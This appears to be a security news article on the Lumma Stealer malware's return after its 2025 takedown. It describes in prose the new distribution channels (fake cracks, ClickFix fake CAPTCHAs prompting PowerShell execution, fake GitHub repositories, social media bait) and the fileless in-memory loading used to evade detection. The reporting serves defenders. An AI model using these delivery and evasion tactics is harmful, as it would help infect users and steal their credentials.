Lumma Stealer Resurfaces After Takedown: New Stealth Tactics Target Users via Fake Cracks, CAPTCHAs & GitHub

The Lumma Stealer malware suffered a massive takedown in May 2025, with over 2,300 malicious domains seized. But just weeks later, Trend Micro reports that Lumma is back.

According to the research team behind Trend Vision On, Lumma Stealer has “quickly reestablished operations and resumed previous targeting activity,” signaling not only resilience but also a significant tactical evolution. The malware is now being distributed via stealthier channels, exploiting cracked software, fake CAPTCHA sites, GitHub repositories, and even social media platforms.

In May 2025, a coordinated international effort involving law enforcement and private cybersecurity firms disrupted Lumma’s infrastructure. The operation included:

• Seizure of 2,300+ C2 domains
• Disruption of login panels and marketplaces
• Disconnection of infected endpoints from Lumma’s servers

Yet, the developer behind Lumma—part of a group Trend Micro tracks as Water Kurita—claimed on the XSS underground forum that “while the infrastructure was compromised, law enforcement did not physically confiscate their server.” Instead, it was accessed and wiped remotely, allegedly through a vulnerability in the Integrated Dell Remote Access Controller (IDRAC).

The attacker also revealed that their admin panel was replaced with a phishing site targeting clients’ IP addresses and webcams.

By June, just a month after the takedown, Lumma’s telemetry activity had already begun to rebound. Trend Micro’s telemetry revealed that targeted accounts surged from June to July, and that the group had adopted a more covert infrastructure strategy:

• Reduced reliance on Cloudflare to avoid detection
• Increased use of Selectel and other Russian providers for hosting, making law enforcement tracking more difficult

“This strategic pivot suggests a move towards providers that might be perceived as less responsive to law enforcement requests,” Trend Micro explains.

Lumma Stealer is now distributed through a wide array of attack vectors, each exploiting users’ curiosity, convenience, or trust:

Fake Cracks and Keygens

• Using search engine manipulation and malvertising, attackers lure victims looking for cracked software to malicious download sites. These sites use JavaScript redirection to a Traffic Distribution System (TDS), which fingerprints the user before delivering a password-protected Lumma downloader.
• ClickFix Campaign

In this variant, fake CAPTCHA pages instruct victims to run PowerShell commands manually, triggering a multi-stage infection process. The downloaded PowerShell script:

• Decrypts a .NET binary via XOR
• Loads the payload directly into memory
• Executes Lumma without touching disk

“This process allows Lumma Stealer to run without saving any files to disk, making it much more difficult for traditional security tools to detect,” the report notes.

• GitHub Repositories

Threat actors set up fake GitHub accounts with AI-generated README files promoting game cheats. The actual payload, often labeled innocently (e.g., TempSpoofer.exe), is hosted in the Releases section or directly downloadable.

• Social Media Bait

On platforms like YouTube and Facebook, attackers promote “Photoshop cracks” or other pirated tools, linking viewers to sites.google.com pages that host the Lumma payload. Posts may include seemingly legitimate links but deliver hidden malware.

Lumma is part of the Malware-as-a-Service (MaaS) ecosystem, enabling even non-technical cybercriminals to run sophisticated information theft campaigns. Its capabilities include:

• Credential and cookie theft
• System fingerprinting
• File exfiltration

“Even cybercriminals with little to no technical knowledge can wield this malware,” warns the report.

Related Posts:

• Europol & Microsoft Lead Global Takedown of Lumma Stealer, World’s Largest Infostealer
• Lumma Stealer: Unpacking Its Evasive Tactics and Complex Infection Chains
• CAPTCHA Trap: Fake Verification Unleashes Lumma Stealer on Unsuspecting Users
• MaaS in Action: How Lumma Stealer Employs Advanced Delivery Techniques
• Lumma Stealer MaaS: Clipboard Hijacking and LOLBins Used in Latest Campaign